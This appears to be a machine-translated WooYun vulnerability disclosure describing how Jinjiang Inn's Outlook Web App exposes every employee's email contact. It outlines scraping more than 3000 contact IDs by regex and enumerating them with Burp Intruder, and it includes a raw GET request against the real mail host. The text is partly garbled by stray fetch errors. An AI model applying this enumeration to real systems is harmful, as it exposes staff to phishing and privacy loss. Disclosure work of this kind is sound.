锦江之星账户体系不严导致集团全部人员邮箱泄露(附outlook联系人下载办法)

漏洞标题 锦江之星账户体系不严导致集团全部人员邮箱泄露(附outlook联系人下载办法) 相关厂商 锦江之星旅馆有限公司 漏洞作者 路人甲 提交时间 2016-04-23 00:54 公开时间 201…

Failure when receiving data from the peer 下面的重点是outlook Web应用程序的联系人导出问题。 这个问题,[电子邮件 保护]/*丹尼尔,他告诉我看看这个 WooYun:视频网站安全优酷土豆帐户系统控制不严,导致内网漫游(涉及后台\云平台主站\内部商城完整源代码\ 100服务器权限和数据库信息等) 每个联系人都有一个特殊ID,如下所示

按组,查找所有员工并将页面保存到本地 https://mail.jj-inn.com/owa/?ae=Item&a=Open&t=ADDistList&id=K15rPYxhC0OQKMpSvP7uPw%3d%3d&pspid=_1461300333450_341817680 自己编写一个脚本,使用正则表达式提取id,总共超过3000个id

由于它不是很好,尝试使用脚本访问https,它是错误的,并且验证设置为False。 这条路是密封的,我们有其他道路,Burp套件,设置变量,建议id进入打嗝,开始运行 页面获取包 GET/owa/?ae=Item&a=Open&t=AD.RecipientType.User&id=§xvJJGKCHR0ayfdGVbJhkvw%3d%3d§&pspid=_1461299763468_260363118HTTP/1.1 主机: mail.jj-inn.com 连接:保持活动状态 高速缓存控制: max-age=0 接受: text/html,application/xhtml + xml,application/xml; q=0.9,image/webp,*/*; q=0.8 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/42.0.2311.154 Safari/537.36 LBBROWSER Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh; q=0.8 Failure when receiving data from the peer